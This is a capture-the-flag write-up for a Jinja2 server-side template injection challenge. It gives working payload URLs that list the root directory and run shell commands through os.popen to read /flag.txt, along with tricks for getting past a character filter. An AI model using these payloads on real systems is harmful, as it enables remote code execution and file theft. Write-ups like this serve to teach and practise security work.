Challenge Description
Picking a starter is hard, I hope you can do it.
Flag format: PCTF{}
Author: @angr404
http://chal.pctf.competitivecyber.club:5555
Solution
This is a simple Jinja2 serverside template injection. This was found using manual fuzzing. What makes this challange a bit more challanging is that some charachters like +-*/"' are not allowed in the URL path. To bypass this we set the charachters in the URL query string.
Listing the root directory.
http://chal.pctf.competitivecyber.club:5555/{{namespace.__init__.__globals__.os.listdir(request.args.f)}}?f=/
The root directory has a file called flag.txt. We can read the file using the following URL.
http://chal.pctf.competitivecyber.club:5555/{{namespace.__init__.__globals__.os.popen(request.args.f).read()}}?f=cat</flag.txt
Flag: PCTF(wHOS7H47PoKEmoN)
(Note: instead of cat</flag.txt you can also use cat${IFS}/flag.txt)
Further reading
- Read jinja2-ssti on how to exploit Jinja2 SSTI.